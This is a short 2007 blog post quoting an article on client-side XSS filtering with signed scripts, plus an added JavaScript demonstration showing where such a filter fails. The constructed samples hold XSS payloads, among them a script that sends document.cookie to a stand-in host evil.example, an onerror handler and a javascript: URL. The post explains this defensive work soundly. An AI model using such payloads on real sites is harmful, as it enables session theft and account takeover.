Anti XSS using Ajax

ripjyr 2007-07-28

I have a feeling it's not only the SCRIPT tag, though...

"After considering the previous two points, we can conclude that to stop an XSS attack that passed through our server-side defenses and validations we need to stop it on the client side, and because XSS attacks basically depend on JavaScript, which means the existence of <script> tags in the attacker's code. So now we can conclude that to stop XSS on the client side we can use JavaScript to filter the HTML returned from the server, identify the attacker's JavaScript, and warn the user about it, or even warn the site admin about it so s/he can become aware of the attack and do something about it. But the real question now is how to identify the attacker's JavaScript from our legitimate JavaScript? Well, we can do this by supplying something like a signature with our legitimate JavaScript so we can tell it apart from the malicious attacker JavaScript that has been injected into our web application pages, and we can use another JavaScript that will filter the page content to identify the unsigned JavaScript as the attacker's script and take some action about it on the client side whenever it is found. Here is an example"
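As an added example (this is not code from the quoted article, nor from ripjyr), the "signed script" filter described in the excerpt written as a small string scanner, run against constructed sample responses. It assumes a hypothetical `data-sig` attribute that the server puts on its own scripts, a stand-in value `TRUSTED_SIG` for the per-response secret, and regex scanning of the raw HTML, which is far simpler than a real browser's parser. The samples show the point of the comment above: a payload that carries no `<script>` tag at all passes the filter untouched, and a guessable signature can simply be copied by the attacker.

```javascript
// Added example, not code from the quoted article or its author.
// Implements the "signed script" idea as a string scanner and shows what it misses.
//
// Assumptions (hypothetical, chosen for this illustration):
//  - the server marks its own scripts with a data-sig attribute whose value is
//    a per-response secret; TRUSTED_SIG stands in for that secret here.
//  - the HTML is scanned as a string with regular expressions. Real browsers
//    parse far more leniently, so this is a demonstration, not a filter to ship.

const TRUSTED_SIG = "a1b2c3"; // constructed stand-in for a per-response nonce

// The excerpt's filter: every <script> block without the signature is flagged.
function findUnsignedScripts(html) {
  const scriptRe = /<script\b([^>]*)>[\s\S]*?<\/script\s*>/gi;
  const unsigned = [];
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const sig = /\bdata-sig\s*=\s*["']([^"']*)["']/i.exec(m[1]);
    if (!sig || sig[1] !== TRUSTED_SIG) unsigned.push(m[0]);
  }
  return unsigned;
}

// What that filter never looks at: inline event handlers and javascript: URLs,
// both of which run attacker JavaScript without any <script> tag.
function findScriptlessVectors(html) {
  const vectors = [];
  const handlerRe = /\son[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi;
  const jsUrlRe = /\b(?:href|src|action)\s*=\s*["']?\s*javascript\s*:/gi;
  for (const re of [handlerRe, jsUrlRe]) {
    let m;
    while ((m = re.exec(html)) !== null) vectors.push(m[0].trim());
  }
  return vectors;
}

// Verdict for one server response body, both as the excerpt's filter would see
// it and once the tag-less vectors are counted as well.
function scanResponse(html) {
  const unsignedScripts = findUnsignedScripts(html);
  const scriptlessVectors = findScriptlessVectors(html);
  const total = unsignedScripts.length + scriptlessVectors.length;
  return {
    unsignedScripts,
    scriptlessVectors,
    signedFilterVerdict: unsignedScripts.length === 0 ? "clean" : "attack",
    fullVerdict: total === 0 ? "clean" : "attack",
  };
}

// Constructed sample responses (not captured traffic).
const SAMPLES = {
  // Only the server's own signed script: should be clean.
  legitimate:
    '<div id="app"></div><script data-sig="a1b2c3">init();</script>',
  // Classic reflected payload with a <script> tag: the filter catches it.
  injectedScriptTag:
    '<p>Hello <script>fetch("//evil.example/?c=" + document.cookie)</script></p>' +
    '<script data-sig="a1b2c3">init();</script>',
  // Same goal, no <script> tag: event handler plus javascript: URL.
  injectedWithoutScriptTag:
    '<p>Hello <img src=x onerror="alert(document.cookie)"> ' +
    '<a href="javascript:alert(1)">click</a></p>' +
    '<script data-sig="a1b2c3">init();</script>',
  // Attacker who learned a static signature just copies it.
  forgedSignature:
    '<p>Hello <script data-sig="a1b2c3">alert(document.cookie)</script></p>' +
    '<script data-sig="a1b2c3">init();</script>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  const r = scanResponse(html);
  console.log(name, "signed-filter:", r.signedFilterVerdict, "full:", r.fullVerdict);
}
```

Two things follow from the samples. The signature only means anything if it is unpredictable for each response, which is the same requirement a CSP `script-src` nonce has; a CSP policy without `'unsafe-inline'` also blocks inline event handlers and `javascript:` URLs, which the excerpt's filter does not look at. And a client-side scan of this kind is at best a detector; it does not replace contextual output encoding on the server.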